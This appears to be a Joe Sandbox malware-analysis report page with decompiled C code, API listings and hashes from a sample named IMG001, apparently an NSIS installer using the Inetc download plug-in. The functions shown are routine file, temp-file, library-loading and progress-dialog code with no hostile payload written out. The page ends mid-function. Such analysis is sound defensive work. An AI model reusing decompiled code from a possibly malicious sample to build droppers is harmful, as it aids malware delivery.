Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`y$soft
API String ID: 4283519449-3997830375
Opcode ID: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction ID: 57f23f0b62e6a01369d39fff8d31ed78eb59a747729ce522ddeed5f5d9bac812
Opcode Fuzzy Hash: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction Fuzzy Hash: 65513671900604ABDB109F64DE89F9E7BA8EF04719F50413BF901B62D1D7BC9D818B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				int _t73;
				long _t74;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t98;
				void* _t99;
				long _t100;
				int _t101;
				long _t102;
				int _t103;
				intOrPtr _t104;
				long _t105;
				void* _t106;

				_t101 = _a16;
				_t98 = _a12;
				_v12 = _t101;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x796458;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E00403093( *0x7c56f8 + _t65);
				}
				_t67 = E00403061( &_a16, 4); // executed
				if(_t67 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 != 0) {
							if(_a16 < _t101) {
								_t101 = _a16;
							}
							if(E00403061(_t98, _t101) != 0) {
								_v8 = _t101;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t102 = _v12;
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E00403061(0x792458, _t102) == 0) {
								goto L44;
							}
							_t73 = WriteFile(_a8, 0x792458, _t102,  &_a12, 0); // executed
							if(_t73 == 0 || _t102 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t68);
								return _t68;
							} else {
								_v8 = _v8 + _t102;
								_a16 = _a16 - _t102;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t74 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x413ba0 = 0xb;
					 *0x413bb8 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t103 = 0x4000;
						if(_a16 < 0x4000) {
							_t103 = _a16;
						}
						if(E00403061(0x792458, _t103) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t103;
						 *0x413b90 = 0x792458;
						 *0x413b94 = _t103;
						while(1) {
							_t99 = _v16;
							 *0x413b98 = _t99;
							 *0x413b9c = _v12;
							_t78 = E00405DEC(0x413b90);
							_v28 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t104 =  *0x413b98; // 0x79ba58
							_t105 = _t104 - _t99;
							_t79 = GetTickCount();
							_t100 = _t79;
							if(( *0x7c5754 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t106 = _t106 + 0xc;
								E00404D8E(0,  &_v92);
								_v20 = _t100;
							}
							if(_t105 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x413b98; // 0x79ba58
									_v8 = _v8 + _t105;
									_v12 = _v12 - _t105;
									_v16 = _t81;
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t83 = WriteFile(_a8, _v16, _t105,  &_v24, 0); // executed
								if(_t83 == 0 || _v24 != _t105) {
									goto L30;
								} else {
									_v8 = _v8 + _t105;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}

APIs

GetTickCount.KERNEL32 ref: 00402EBD
GetTickCount.KERNEL32 ref: 00402F44
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F71
wsprintfA.USER32 ref: 00402F81
WriteFile.KERNEL32(00000000,00000000,0079BA58,7FFFFFFF,00000000), ref: 00402FAF

Strings

X$y, xrefs: 00402EE6
... %d%%, xrefs: 00402F7B
Xdy, xrefs: 00402E84
X$y, xrefs: 00402FF9

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$X$y$X$y$Xdy
API String ID: 4209647438-903886050
Opcode ID: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction ID: 5e4643fca21cfadc9de8a04f2b9c08e4ac3460f651f3ecbcf400e8ec413ecb9d
Opcode Fuzzy Hash: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction Fuzzy Hash: 0C51A17180121AEBCF10DF65DA48A9F7BB8AB04359F10413BF914B72C1D7789E40DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004056F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056F6(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

APIs

GetTickCount.KERNEL32 ref: 00405709
GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 00405723

Strings

nsa, xrefs: 00405702

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: a41147e2ad70ab0e88512ae138b54e0503036a62734e23b080708fabd9fe5612
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 56F0A036348248BBEB104E55EC04B9B7FADDF91760F14C03BFA449B1C0D6B1995897A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D12, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D12(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405d1a
0x00405d1d
0x00405d24
0x00405d2c
0x00405d39
0x00000000
0x00405d40
0x00405d2f
0x00405d37
0x00000000
0x00000000
0x00405d48

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
LoadLibraryA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D2F
GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: e428d20ee9bf7b263dfbdc6b1eaa460cc0a746502d73873f4fda876fa73e4f8f
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 10E08C36A04510BBD3215F209E0896B73A8EEDAB40300487EF615F6251D734AC11DFBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7c56d0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7c168c =  *0x7c168c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7c168c, 0x7530,  *0x7c1674), 0);
					}
				}
				return 0;
			}

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction ID: 92ca41f03990f75d421953f0ce28a402da3267ab35400c7ec7b801fcc1cee25f
Opcode Fuzzy Hash: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction Fuzzy Hash: 510144316242109BE7081B389D08B6A3398E710328F14823FF841F36F1EA38DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004056C7, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004056C7(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004056cb
0x004056d8
0x004056ed
0x004056f3

APIs

GetFileAttributesA.KERNEL32(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056A8(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}

0x004056ac
0x004056b5
0x004056be
0x00000000
0x004056be
0x004056c4

APIs

GetFileAttributesA.KERNEL32(?,004054B3,?,?,?), ref: 004056AC
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056BE

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 5b6c8abf5c6657dd1eb2aacdbb88165d5ef3b362f1ace4ec03089f8aa3a349a3
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: 07C04CB1818501ABDA015B24DF0D82F7F66EB60322B508F35F56DE00F0CB355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403061, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403061(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403065
0x00403078
0x00403080
0x00000000
0x00403087
0x00000000
0x00403089

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,00402EAB,000000FF,00000004,00000000,00000000,00000000), ref: 00403078

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 6f2b57ed93274e24fd49225d19a01d35385a3562131b0f82fbcc89c4f8353da0
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: 9CE08631111118BBDF209F61DC00A977B6CEB05362F008036FE44E6190D530DA10DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004030AA, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004030AA(void* __eflags) {
				void* _t2;
				void* _t5;

				E00405C52(0x7f8000);
				_t2 = E00405550(0x7f8000);
				if(_t2 != 0) {
					E004054E3(0x7f8000);
					CreateDirectoryA(0x7f8000, 0); // executed
					_t5 = E004056F6(0x7f6000, 0x7f8000); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030b1
0x004030b7
0x004030be
0x004030c3
0x004030cb
0x004030d7
0x004030dd
0x004030c1
0x004030c1
0x004030c1

APIs

Part of subcall function 00405C52: CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
Part of subcall function 00405C52: CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
Part of subcall function 00405C52: CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
Part of subcall function 00405C52: CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

CreateDirectoryA.KERNEL32(007F8000,00000000,007F8000,007F8000,007F8000,00000000,00403228), ref: 004030CB

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction ID: 9f9433c174eaf46919c8f2835a4fc40c5a78850b628f18ddb5a9b5ca7a4d18ad
Opcode Fuzzy Hash: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction Fuzzy Hash: 7FD0C92151BD3031D9A2376A7D06FDF064C9F0272AF51447BFA04B52CA9E6C1A8209EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403093, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403093(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030a1
0x004030a7

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00402DE9,?), ref: 004030A1

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 7381207B, Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 208
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E7381207B(struct HWND__* _a4) {
				signed int _v8;
				signed int _v12;
				char _v140;
				long _t77;
				int _t83;
				CHAR* _t84;
				int _t87;
				int _t99;
				int _t108;
				int _t121;
				signed int _t123;
				int _t130;
				signed int _t137;
				int _t146;
				struct HWND__* _t174;
				int _t176;
				void* _t178;
				void* _t179;
				void* _t180;

				_v8 = (GetTickCount() -  *0x73815ad0) / 0x3e8;
				_t77 = GetTickCount();
				_t137 =  *0x73815ab4; // 0x4
				_v12 = (_t77 -  *0x73815acc) / 0x3e8;
				_t141 =  ==  ? "Inetc plug-in" : 0x73815828;
				wsprintfA( &_v140, "%s - %s",  ==  ? "Inetc plug-in" : 0x73815828, (_t137 << 5) + 0x73815000);
				_t83 =  *0x73815ac0; // 0x0
				_t180 = _t179 + 0x10;
				if(_t83 != 0 && _t83 != 0xffffffff &&  *0x73815ab4 == 2) {
					_t130 = MulDiv(0x64,  *0x73815ab8, _t83);
					wsprintfA(_t178 + lstrlenA( &_v140) - 0x88, " %d%%", _t130);
					_t180 = _t180 + 0xc;
				}
				_t174 = _a4;
				if( *0x738157dc == 0) {
					SetWindowTextA(_t174,  &_v140);
				}
				_t84 =  *0x738157d0; // 0x0
				if(_t84 == 0 ||  *_t84 == 0) {
					_t84 =  *0x738157cc; // 0x3146150
				}
				SetDlgItemTextA(_t174, 0x3e9, _t84);
				SetDlgItemTextA(_t174, 0x3ea, 0x738156c8);
				_t87 =  *0x73815ab8; // 0x0
				if(_t87 == 0) {
					_v140 = 0;
					goto L14;
				} else {
					E738115F9(_t87,  &_v140);
					_t176 = _v8;
					if(_t176 > 1 &&  *0x73815ab4 == 2) {
						lstrcatA( &_v140, "   ( ");
						_t121 = lstrlenA( &_v140);
						_t123 =  *0x73815ab8; // 0x0
						E738115F9(_t123 / _v8,  &(( &_v140)[_t121]));
						lstrcatA( &_v140, "/sec )");
						L14:
						_t176 = _v8;
					}
				}
				SetDlgItemTextA(_t174, 0x3eb,  &_v140);
				_t90 = _v12;
				_v8 = 0x3c;
				wsprintfA( &_v140, "%d:%02d:%02d", _v12 / 0xe10, _v12 / _v8 % _v8, _t90 % _v8);
				SetDlgItemTextA(_t174, 0x3ef,  &_v140);
				_t99 =  *0x73815ac0; // 0x0
				if(_t99 != 0 && _t99 != 0xffffffff) {
					E738115F9(_t99,  &_v140);
					SetDlgItemTextA(_t174, 0x3ee,  &_v140);
